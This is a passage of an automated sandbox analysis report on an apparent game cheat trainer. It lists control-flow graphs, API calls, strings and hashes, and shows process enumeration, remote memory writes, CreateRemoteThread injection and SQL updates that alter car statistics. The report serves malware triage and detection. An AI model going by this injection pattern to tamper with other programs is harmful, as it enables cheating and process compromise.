                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 639 7ff8b8f73180-7ff8b8f731d6 ?_Xlength_error@std@@YAXPEBD@Z 641 7ff8b8f731dc-7ff8b8f7320f call 7ff8b8f74150 639->641 642 7ff8b8f736aa-7ff8b8f736d3 call 7ff8b8f74570 639->642 647 7ff8b8f73213-7ff8b8f73216 641->647 648 7ff8b8f73218-7ff8b8f73224 647->648 649 7ff8b8f73226-7ff8b8f73239 call 7ff8b8f73f70 647->649 650 7ff8b8f7323d-7ff8b8f73247 648->650 649->650 650->647 652 7ff8b8f73249-7ff8b8f73265 650->652 654 7ff8b8f7327d 652->654 655 7ff8b8f73267-7ff8b8f73279 call 7ff8b8f74150 652->655 657 7ff8b8f73281-7ff8b8f73284 654->657 655->654 659 7ff8b8f73286-7ff8b8f73292 657->659 660 7ff8b8f73294-7ff8b8f732a7 call 7ff8b8f73f70 657->660 661 7ff8b8f732ab-7ff8b8f732b5 659->661 660->661 661->657 664 7ff8b8f732b7-7ff8b8f732c5 661->664 665 7ff8b8f732d0-7ff8b8f732e8 664->665 666 7ff8b8f732ea-7ff8b8f732fc call 7ff8b8f74150 665->666 667 7ff8b8f73300 665->667 666->667 669 7ff8b8f73304-7ff8b8f73307 667->669 671 7ff8b8f73309-7ff8b8f73315 669->671 672 7ff8b8f73317-7ff8b8f7332a call 7ff8b8f73f70 669->672 673 7ff8b8f7332e-7ff8b8f73338 671->673 672->673 673->669 676 7ff8b8f7333a-7ff8b8f7334f 673->676 677 7ff8b8f73367-7ff8b8f7336b 676->677 678 7ff8b8f73351-7ff8b8f73363 call 7ff8b8f74150 676->678 680 7ff8b8f73370-7ff8b8f73373 677->680 678->677 681 7ff8b8f73375-7ff8b8f73381 680->681 682 7ff8b8f73383-7ff8b8f73396 call 7ff8b8f73f70 680->682 684 7ff8b8f7339a-7ff8b8f733a4 681->684 682->684 684->680 687 7ff8b8f733a6-7ff8b8f733ac 684->687 687->665 688 7ff8b8f733b2-7ff8b8f733ce 687->688 689 7ff8b8f733e6-7ff8b8f733ea 688->689 690 7ff8b8f733d0-7ff8b8f733e2 call 7ff8b8f74150 688->690 692 7ff8b8f733f0-7ff8b8f733f3 689->692 690->689 694 7ff8b8f733f5-7ff8b8f73401 692->694 695 7ff8b8f73403-7ff8b8f73416 call 7ff8b8f73f70 692->695 696 7ff8b8f7341a-7ff8b8f73424 694->696 695->696 696->692 698 7ff8b8f73426-7ff8b8f73438 696->698 700 7ff8b8f73440-7ff8b8f73458 698->700 701 7ff8b8f7345a-7ff8b8f7346c call 7ff8b8f74150 700->701 702 7ff8b8f73470 700->702 701->702 704 7ff8b8f73474-7ff8b8f73477 702->704 706 7ff8b8f73479-7ff8b8f73485 704->706 707 7ff8b8f73487-7ff8b8f7349a call 7ff8b8f73f70 704->707 708 7ff8b8f7349e-7ff8b8f734a8 706->708 707->708 708->704 711 7ff8b8f734aa-7ff8b8f734bf 708->711 712 7ff8b8f734d7-7ff8b8f734db 711->712 713 7ff8b8f734c1-7ff8b8f734d3 call 7ff8b8f74150 711->713 714 7ff8b8f734e0-7ff8b8f734e3 712->714 713->712 717 7ff8b8f734e5-7ff8b8f734f1 714->717 718 7ff8b8f734f3-7ff8b8f73506 call 7ff8b8f73f70 714->718 719 7ff8b8f7350a-7ff8b8f73514 717->719 718->719 719->714 722 7ff8b8f73516-7ff8b8f7351c 719->722 722->700 723 7ff8b8f73522-7ff8b8f73538 722->723 724 7ff8b8f7353a-7ff8b8f7354c call 7ff8b8f74150 723->724 725 7ff8b8f73550 723->725 724->725 727 7ff8b8f73554-7ff8b8f73557 725->727 729 7ff8b8f73559-7ff8b8f73565 727->729 730 7ff8b8f73567-7ff8b8f7357a call 7ff8b8f73f70 727->730 731 7ff8b8f7357e-7ff8b8f73588 729->731 730->731 731->727 734 7ff8b8f7358a-7ff8b8f73594 731->734 735 7ff8b8f73596-7ff8b8f735a0 734->735 736 7ff8b8f735a2-7ff8b8f735b6 call 7ff8b8f73f70 734->736 737 7ff8b8f735ba-7ff8b8f735c8 735->737 736->737 740 7ff8b8f735ce-7ff8b8f73648 call 7ff8b8f74920 VirtualAllocEx WriteProcessMemory 737->740 741 7ff8b8f736d4-7ff8b8f73717 call 7ff8b8f73f50 737->741 747 7ff8b8f7366f-7ff8b8f73672 740->747 748 7ff8b8f7364a-7ff8b8f7366e VirtualFreeEx call 7ff8b8f74918 740->748 750 7ff8b8f7371d-7ff8b8f73725 741->750 751 7ff8b8f73b32-7ff8b8f73b5a call 7ff8b8f74570 741->751 747->642 749 7ff8b8f73674-7ff8b8f73681 747->749 748->747 753 7ff8b8f7369f-7ff8b8f736a5 call 7ff8b8f74918 749->753 754 7ff8b8f73683-7ff8b8f73696 749->754 755 7ff8b8f73778-7ff8b8f737ea call 7ff8b8f731a0 750->755 756 7ff8b8f73727-7ff8b8f73772 ReadProcessMemory memcmp 750->756 753->642 754->753 759 7ff8b8f73698-7ff8b8f7369e _invalid_parameter_noinfo_noreturn 754->759 764 7ff8b8f7381c-7ff8b8f73833 755->764 765 7ff8b8f737ec-7ff8b8f737f9 755->765 756->751 756->755 759->753 768 7ff8b8f7383e 764->768 769 7ff8b8f73835-7ff8b8f7383c 764->769 766 7ff8b8f737fb-7ff8b8f7380e 765->766 767 7ff8b8f73817 call 7ff8b8f74918 765->767 771 7ff8b8f73814 766->771 772 7ff8b8f73ae1-7ff8b8f73ae7 _invalid_parameter_noinfo_noreturn 766->772 767->764 770 7ff8b8f73845-7ff8b8f73879 call 7ff8b8f73f70 768->770 769->770 778 7ff8b8f7387b-7ff8b8f73885 770->778 779 7ff8b8f73887-7ff8b8f7389b call 7ff8b8f73f70 770->779 771->767 775 7ff8b8f73ae8-7ff8b8f73af3 call 7ff8b8f74918 772->775 782 7ff8b8f73af4-7ff8b8f73afc 775->782 781 7ff8b8f7389f-7ff8b8f738a9 778->781 779->781 784 7ff8b8f738ab-7ff8b8f738b5 781->784 785 7ff8b8f738b7-7ff8b8f738cb call 7ff8b8f73f70 781->785 782->751 786 7ff8b8f73afe-7ff8b8f73b0f 782->786 788 7ff8b8f738cf-7ff8b8f738d9 784->788 785->788 789 7ff8b8f73b2d call 7ff8b8f74918 786->789 790 7ff8b8f73b11-7ff8b8f73b24 786->790 793 7ff8b8f738db-7ff8b8f738e5 788->793 794 7ff8b8f738e7-7ff8b8f738fb call 7ff8b8f73f70 788->794 789->751 790->789 795 7ff8b8f73b26-7ff8b8f73b2c _invalid_parameter_noinfo_noreturn 790->795 798 7ff8b8f738ff-7ff8b8f73918 793->798 794->798 795->789 800 7ff8b8f7391a-7ff8b8f7392c call 7ff8b8f74150 798->800 801 7ff8b8f73930 798->801 800->801 803 7ff8b8f73934-7ff8b8f73937 801->803 805 7ff8b8f73939-7ff8b8f73945 803->805 806 7ff8b8f73947-7ff8b8f7395a call 7ff8b8f73f70 803->806 808 7ff8b8f7395e-7ff8b8f73968 805->808 806->808 808->803 810 7ff8b8f7396a-7ff8b8f7398a 808->810 811 7ff8b8f7398c-7ff8b8f7399e call 7ff8b8f74150 810->811 812 7ff8b8f739a2 810->812 811->812 814 7ff8b8f739a6-7ff8b8f739a9 812->814 816 7ff8b8f739ab-7ff8b8f739b7 814->816 817 7ff8b8f739b9-7ff8b8f739cc call 7ff8b8f73f70 814->817 818 7ff8b8f739d0-7ff8b8f739da 816->818 817->818 818->814 820 7ff8b8f739dc-7ff8b8f739ed 818->820 822 7ff8b8f739ef-7ff8b8f73a01 call 7ff8b8f74150 820->822 823 7ff8b8f73a05-7ff8b8f73a09 820->823 822->823 825 7ff8b8f73a10-7ff8b8f73a13 823->825 827 7ff8b8f73a15-7ff8b8f73a21 825->827 828 7ff8b8f73a23-7ff8b8f73a36 call 7ff8b8f73f70 825->828 830 7ff8b8f73a3a-7ff8b8f73a44 827->830 828->830 830->825 832 7ff8b8f73a46-7ff8b8f73a51 830->832 833 7ff8b8f73b5b-7ff8b8f73b6f _CxxThrowException 832->833 834 7ff8b8f73a57-7ff8b8f73abb WriteProcessMemory * 2 832->834 834->782 835 7ff8b8f73abd-7ff8b8f73aca 834->835 835->775 836 7ff8b8f73acc-7ff8b8f73adf 835->836 836->772 836->775
                                                                          APIs
                                                                          Strings
                                                                          • vector too long, xrefs: 00007FF8B8F73184
                                                                          • UPDATE %s SET TopSpeed=%f, DistanceDriven=%u, TimeDriven=%u, TotalWinnings=%u, TotalRepairs=%u, NumPodiums=%u, NumVictories=%u, NumRaces=%u, NumOwners=%u, NumTimesSold=%u, TimeDrivenInRoadTrips=%u, CurOwnerNumRaces=%u, CurOwnerWinnings=%u, NumSkillPointsEarned, xrefs: 00007FF8B8F73426
                                                                          • @, xrefs: 00007FF8B8F735F7
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.3438062399.00007FF8B8F71000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8B8F70000, based on PE: true
                                                                          • Associated: 00000006.00000002.3438034254.00007FF8B8F70000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000006.00000002.3438111984.00007FF8B8F76000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000006.00000002.3438142825.00007FF8B8F78000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000006.00000002.3438167519.00007FF8B8F79000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_7ff8b8f70000_Stand_Trainer_Updated.jbxd
                                                                          Similarity
                                                                          • API ID: MemoryProcess$Write_invalid_parameter_noinfo_noreturn$Virtualmemcpy$AllocExceptionFreeReadThrowXlength_error@std@@mallocmemcmp
                                                                          • String ID: @$UPDATE %s SET TopSpeed=%f, DistanceDriven=%u, TimeDriven=%u, TotalWinnings=%u, TotalRepairs=%u, NumPodiums=%u, NumVictories=%u, NumRaces=%u, NumOwners=%u, NumTimesSold=%u, TimeDrivenInRoadTrips=%u, CurOwnerNumRaces=%u, CurOwnerWinnings=%u, NumSkillPointsEarned$vector too long
                                                                          • API String ID: 3432736595-2273485850
                                                                          • Opcode ID: ff04e743a14e27a5f50ae3e48831c4d593fa7fcaafc929ef685421284231d40a
                                                                          • Instruction ID: 7e4ceb09d37dab1d7efa4b07f09a372300a7c2beaf69d76f76d76827daf2eac1
                                                                          • Opcode Fuzzy Hash: ff04e743a14e27a5f50ae3e48831c4d593fa7fcaafc929ef685421284231d40a
                                                                          • Instruction Fuzzy Hash: 9952483AB15A5598FB118F69D8402EC6B71FB18BC9F884132EB5D27B99DF38D542C308
                                                                          Function 00007FF8B8F71910 Relevance: 24.8, APIs: 13, Strings: 1, Instructions: 277injectionmemorysynchronizationCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 837 7ff8b8f71910-7ff8b8f71913 838 7ff8b8f71919-7ff8b8f7197e call 7ff8b8f74150 837->838 839 7ff8b8f71cb7 837->839 842 7ff8b8f71982-7ff8b8f71985 838->842 843 7ff8b8f71987-7ff8b8f71993 842->843 844 7ff8b8f71995-7ff8b8f719a8 call 7ff8b8f73f70 842->844 845 7ff8b8f719ac-7ff8b8f719b6 843->845 844->845 845->842 848 7ff8b8f719b8-7ff8b8f719c2 845->848 849 7ff8b8f719c4-7ff8b8f719ce 848->849 850 7ff8b8f719d0-7ff8b8f719e4 call 7ff8b8f73f70 848->850 851 7ff8b8f719e8-7ff8b8f719f6 849->851 850->851 854 7ff8b8f719fc-7ff8b8f71c53 call 7ff8b8f74920 VirtualAllocEx WriteProcessMemory call 7ff8b8f74920 VirtualAllocEx WriteProcessMemory call 7ff8b8f74920 VirtualAllocEx WriteProcessMemory CreateRemoteThread call 7ff8b8f74920 WaitForSingleObject call 7ff8b8f74918 VirtualFreeEx call 7ff8b8f74918 VirtualFreeEx call 7ff8b8f74918 VirtualFreeEx call 7ff8b8f74918 851->854 855 7ff8b8f71cb8-7ff8b8f71ccf call 7ff8b8f73f50 851->855 882 7ff8b8f71c8b-7ff8b8f71cb6 call 7ff8b8f74570 854->882 883 7ff8b8f71c55-7ff8b8f71c62 854->883 860 7ff8b8f71d0b-7ff8b8f71d10 855->860 861 7ff8b8f71cd1-7ff8b8f71cdf 855->861 863 7ff8b8f71cf9-7ff8b8f71d07 call 7ff8b8f74918 861->863 864 7ff8b8f71ce1-7ff8b8f71cf4 861->864 863->860 867 7ff8b8f71cf6 864->867 868 7ff8b8f71d11-7ff8b8f71d27 _invalid_parameter_noinfo_noreturn 864->868 867->863 868->837 882->839 885 7ff8b8f71c64-7ff8b8f71c77 883->885 886 7ff8b8f71c80-7ff8b8f71c86 call 7ff8b8f74918 883->886 885->886 889 7ff8b8f71c79-7ff8b8f71c7f _invalid_parameter_noinfo_noreturn 885->889 886->882 889->886
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.3438062399.00007FF8B8F71000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8B8F70000, based on PE: true
                                                                          • Associated: 00000006.00000002.3438034254.00007FF8B8F70000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000006.00000002.3438111984.00007FF8B8F76000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000006.00000002.3438142825.00007FF8B8F78000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000006.00000002.3438167519.00007FF8B8F79000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_7ff8b8f70000_Stand_Trainer_Updated.jbxd
                                                                          Similarity
                                                                          • API ID: Virtual$AllocFreeMemoryProcessWrite$_invalid_parameter_noinfo_noreturnmemcpy$CreateObjectRemoteSingleThreadWaitmalloc
                                                                          • String ID: @
                                                                          • API String ID: 359211796-2766056989
                                                                          • Opcode ID: 923724aed1add0c9db85f855cc3076c4de2bc1b638331ad5104b5904c44cb73a
                                                                          • Instruction ID: 86016f5c95a8637869d6b2ac1ddf107d20c970d820f06f0f2b4e408ffb75e78a
                                                                          • Opcode Fuzzy Hash: 923724aed1add0c9db85f855cc3076c4de2bc1b638331ad5104b5904c44cb73a
                                                                          • Instruction Fuzzy Hash: 93C1553AA04E4185EB10CF6AE8402AD7BA5FB88BC9F458036DB8D53B58CF3CD556C344
                                                                          Function 00007FF8B8F72720 Relevance: 13.9, APIs: 9, Instructions: 427COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.3438062399.00007FF8B8F71000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8B8F70000, based on PE: true
                                                                          • Associated: 00000006.00000002.3438034254.00007FF8B8F70000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000006.00000002.3438111984.00007FF8B8F76000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000006.00000002.3438142825.00007FF8B8F78000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000006.00000002.3438167519.00007FF8B8F79000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_7ff8b8f70000_Stand_Trainer_Updated.jbxd
                                                                          Similarity
                                                                          • API ID: _invalid_parameter_noinfo_noreturn$MemoryProcessRead
                                                                          • String ID:
                                                                          • API String ID: 1606301450-0
                                                                          • Opcode ID: 5ae2e6b79edec0f3968cffdec89c313936049c9e9988ad8e25bec2b751d6e6f8
                                                                          • Instruction ID: 55ddf74b1ab241e2e6bfb4315bf853ce9b781a58a089e57827d9bc9eec17c628
                                                                          • Opcode Fuzzy Hash: 5ae2e6b79edec0f3968cffdec89c313936049c9e9988ad8e25bec2b751d6e6f8
                                                                          • Instruction Fuzzy Hash: 05223876B04A469AFB04CFA8D4442EC3BB1EB4479DF40453AEB5D17B99DF38924AC348
                                                                          Function 00007FF8B8F75024 Relevance: 13.6, APIs: 9, Instructions: 72COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.3438062399.00007FF8B8F71000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8B8F70000, based on PE: true
                                                                          • Associated: 00000006.00000002.3438034254.00007FF8B8F70000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000006.00000002.3438111984.00007FF8B8F76000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000006.00000002.3438142825.00007FF8B8F78000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000006.00000002.3438167519.00007FF8B8F79000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_7ff8b8f70000_Stand_Trainer_Updated.jbxd
                                                                          Similarity
                                                                          • API ID: ExceptionFilterPresentUnhandledmemset$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                          • String ID:
                                                                          • API String ID: 313767242-0
                                                                          • Opcode ID: 90f41556a7343738b2213ee9ee7f69b153d5a3b61cd0325a1c433d6b6fd49eb8
                                                                          • Instruction ID: 590001dbdbde517a707876491a9a35dc9d0df260b3ee704261e324253b9ae481
                                                                          • Opcode Fuzzy Hash: 90f41556a7343738b2213ee9ee7f69b153d5a3b61cd0325a1c433d6b6fd49eb8
                                                                          • Instruction Fuzzy Hash: ED314876609E828AFB608F64E8407ED2760FB88785F44403ADB4E47B98EF3CD549C708
                                                                          Function 00007FF8B8F731A0 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 304COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          • UPDATE %s SET TopSpeed=%f, DistanceDriven=%u, TimeDriven=%u, TotalWinnings=%u, TotalRepairs=%u, NumPodiums=%u, NumVictories=%u, NumRaces=%u, NumOwners=%u, NumTimesSold=%u, TimeDrivenInRoadTrips=%u, CurOwnerNumRaces=%u, CurOwnerWinnings=%u, NumSkillPointsEarned, xrefs: 00007FF8B8F73426
                                                                          • @, xrefs: 00007FF8B8F735F7
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.3438062399.00007FF8B8F71000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8B8F70000, based on PE: true
                                                                          • Associated: 00000006.00000002.3438034254.00007FF8B8F70000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000006.00000002.3438111984.00007FF8B8F76000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000006.00000002.3438142825.00007FF8B8F78000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000006.00000002.3438167519.00007FF8B8F79000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_7ff8b8f70000_Stand_Trainer_Updated.jbxd
                                                                          Similarity
                                                                          • API ID: memcpy
                                                                          • String ID: @$UPDATE %s SET TopSpeed=%f, DistanceDriven=%u, TimeDriven=%u, TotalWinnings=%u, TotalRepairs=%u, NumPodiums=%u, NumVictories=%u, NumRaces=%u, NumOwners=%u, NumTimesSold=%u, TimeDrivenInRoadTrips=%u, CurOwnerNumRaces=%u, CurOwnerWinnings=%u, NumSkillPointsEarned
                                                                          • API String ID: 3510742995-1189540536
                                                                          • Opcode ID: 4d45d62620878725b11631fcb973c50a749d28f5e7bf7a6448b0e22a4ade31d5
                                                                          • Instruction ID: 9c2407ad31b36452c0bdf0c1eb77473862ecb7a858179582bdec50c0f3efc3e9
                                                                          • Opcode Fuzzy Hash: 4d45d62620878725b11631fcb973c50a749d28f5e7bf7a6448b0e22a4ade31d5
                                                                          • Instruction Fuzzy Hash: B1D16B36F15AA588FB11CB69E8401AC6BB0BB18BD9F884131DF5D67B98DF38D542C308
                                                                          Function 00007FF8B8F72230 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 148stringprocessthreadCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 890 7ff8b8f72230-7ff8b8f7227f CreateToolhelp32Snapshot 891 7ff8b8f723fb-7ff8b8f7242d strcpy_s call 7ff8b8f72550 890->891 892 7ff8b8f72285-7ff8b8f72295 Process32First 890->892 897 7ff8b8f7242f-7ff8b8f72439 891->897 898 7ff8b8f72456-7ff8b8f72467 891->898 893 7ff8b8f7229b-7ff8b8f7229d 892->893 893->891 896 7ff8b8f722a3-7ff8b8f722a7 893->896 899 7ff8b8f722b9-7ff8b8f722de call 7ff8b8f74920 896->899 900 7ff8b8f722a9-7ff8b8f722b7 Process32Next 896->900 897->898 901 7ff8b8f7243b-7ff8b8f7244b 897->901 903 7ff8b8f72469-7ff8b8f7246f free 898->903 904 7ff8b8f72476-7ff8b8f7249c call 7ff8b8f74570 898->904 908 7ff8b8f722e1-7ff8b8f722e9 899->908 900->893 901->898 910 7ff8b8f7244d-7ff8b8f72450 901->910 903->904 908->908 911 7ff8b8f722eb-7ff8b8f7231c call 7ff8b8f71720 908->911 910->898 914 7ff8b8f7231e-7ff8b8f72326 911->914 915 7ff8b8f72372-7ff8b8f72375 911->915 917 7ff8b8f72328-7ff8b8f72336 914->917 918 7ff8b8f72355-7ff8b8f7236d call 7ff8b8f74918 914->918 915->891 916 7ff8b8f7237b-7ff8b8f7239e GetForegroundWindow GetWindowThreadProcessId 915->916 920 7ff8b8f723c0-7ff8b8f723c7 916->920 921 7ff8b8f723a0-7ff8b8f723a7 916->921 922 7ff8b8f72338-7ff8b8f7234b 917->922 923 7ff8b8f72350 call 7ff8b8f74918 917->923 918->915 925 7ff8b8f723e3-7ff8b8f723eb 920->925 926 7ff8b8f723c9-7ff8b8f723d0 920->926 924 7ff8b8f723a9-7ff8b8f723b7 921->924 921->925 927 7ff8b8f7234d 922->927 928 7ff8b8f723b9-7ff8b8f723bf _invalid_parameter_noinfo_noreturn 922->928 923->918 930 7ff8b8f723d7-7ff8b8f723dd strcpy_s 924->930 925->904 931 7ff8b8f723f1-7ff8b8f723f6 call 7ff8b8f736e0 925->931 926->930 927->923 928->920 930->925 931->904
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.3438062399.00007FF8B8F71000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8B8F70000, based on PE: true
                                                                          • Associated: 00000006.00000002.3438034254.00007FF8B8F70000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000006.00000002.3438111984.00007FF8B8F76000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000006.00000002.3438142825.00007FF8B8F78000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000006.00000002.3438167519.00007FF8B8F79000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_7ff8b8f70000_Stand_Trainer_Updated.jbxd
                                                                          Similarity
                                                                          • API ID: Process32Windowstrcpy_s$CreateFirstForegroundNextProcessSnapshotThreadToolhelp32_invalid_parameter_noinfo_noreturnfree
                                                                          • String ID: focus$reset$unfocus
                                                                          • API String ID: 64550660-3106794205
                                                                          • Opcode ID: e7c99580bd7c60a15c07992298f68fdcd850852949cf6604d91e12ff0a8fd0d3
                                                                          • Instruction ID: 066c8d833dd591e6cbf59c68c3f6e8639b03f44bf9e41aced13e58eb7d8beeae
                                                                          • Opcode Fuzzy Hash: e7c99580bd7c60a15c07992298f68fdcd850852949cf6604d91e12ff0a8fd0d3
                                                                          • Instruction Fuzzy Hash: E4619439A08E8285FB518F69E8443797BA0FB48BD6F044135DB8E067A5DF3CE486C758
                                                                          Function 00007FF8B8F71720 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 132injectionCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.3438062399.00007FF8B8F71000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8B8F70000, based on PE: true
                                                                          • Associated: 00000006.00000002.3438034254.00007FF8B8F70000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000006.00000002.3438111984.00007FF8B8F76000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000006.00000002.3438142825.00007FF8B8F78000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000006.00000002.3438167519.00007FF8B8F79000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_7ff8b8f70000_Stand_Trainer_Updated.jbxd
                                                                          Similarity
                                                                          • API ID: MemoryProcessWrite$memcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturnmalloc
                                                                          • String ID: AND NotAvailableInAutoshow=0$ AND NotAvailableInAutoshow=1
                                                                          • API String ID: 2427741960-1967300337
                                                                          • Opcode ID: 50c7807b714074bc3cde8963075cd9d3c8a6124ba4fd18cff7efebee71432e17
                                                                          • Instruction ID: abbc32d83b9a31b2c23a2abc8894031f9c69419c3dba68e141185b6ff2227feb
                                                                          • Opcode Fuzzy Hash: 50c7807b714074bc3cde8963075cd9d3c8a6124ba4fd18cff7efebee71432e17
                                                                          • Instruction Fuzzy Hash: 2251AE3AA08E8684FA149F59E5042B92B61FB44FD6F640531DB6D07B95DF3CE49BC308
                                                                          Function 00007FF8B8F74988 Relevance: 13.7, APIs: 9, Instructions: 230COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.3438062399.00007FF8B8F71000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8B8F70000, based on PE: true
                                                                          • Associated: 00000006.00000002.3438034254.00007FF8B8F70000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000006.00000002.3438111984.00007FF8B8F76000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000006.00000002.3438142825.00007FF8B8F78000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000006.00000002.3438167519.00007FF8B8F79000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_7ff8b8f70000_Stand_Trainer_Updated.jbxd
                                                                          Similarity
                                                                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_initialize_crt__scrt_release_startup_lock
                                                                          • String ID:
                                                                          • API String ID: 349153199-0
                                                                          • Opcode ID: 5dc3a2c061d603ebea0dc15b17bef94147f44fca3a790ac9016eac81c12b021b
                                                                          • Instruction ID: f8c2b24086ac449249b5e601eec1be8052204570daf941076080c150c4a3e11e
                                                                          • Opcode Fuzzy Hash: 5dc3a2c061d603ebea0dc15b17bef94147f44fca3a790ac9016eac81c12b021b
                                                                          • Instruction Fuzzy Hash: 92817B38E08E4386FA90AB6D98412797E90AFA57C6F144135DB1C87796DF2CE843C71C
                                                                          Function 00007FF8B8F710C0 Relevance: 13.6, APIs: 9, Instructions: 108injectionCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.3438062399.00007FF8B8F71000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8B8F70000, based on PE: true
                                                                          • Associated: 00000006.00000002.3438034254.00007FF8B8F70000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000006.00000002.3438111984.00007FF8B8F76000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000006.00000002.3438142825.00007FF8B8F78000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000006.00000002.3438167519.00007FF8B8F79000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_7ff8b8f70000_Stand_Trainer_Updated.jbxd
                                                                          Similarity
                                                                          • API ID: MemoryProcess$Read$Write
                                                                          • String ID:
                                                                          • API String ID: 2601675199-0
                                                                          • Opcode ID: 7ee7c050f7f7f51261b789aad5b224ef0e50c02b930656cee03c470f5aaca468
                                                                          • Instruction ID: c2e4db62a3d53f5548c8058100c680439b7028de5fccf65d628076706dc7a049
                                                                          • Opcode Fuzzy Hash: 7ee7c050f7f7f51261b789aad5b224ef0e50c02b930656cee03c470f5aaca468
                                                                          • Instruction Fuzzy Hash: 5E51ECBA616F9689EB908F5AE8406987720F788BCAF445026EF4E53728DF3CC146C344
                                                                          Function 00007FF8B8F73B70 Relevance: 12.1, APIs: 8, Instructions: 137COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.3438062399.00007FF8B8F71000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8B8F70000, based on PE: true
                                                                          • Associated: 00000006.00000002.3438034254.00007FF8B8F70000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000006.00000002.3438111984.00007FF8B8F76000.00000002.00000001.01000000.0000000A.sdmpDownload File
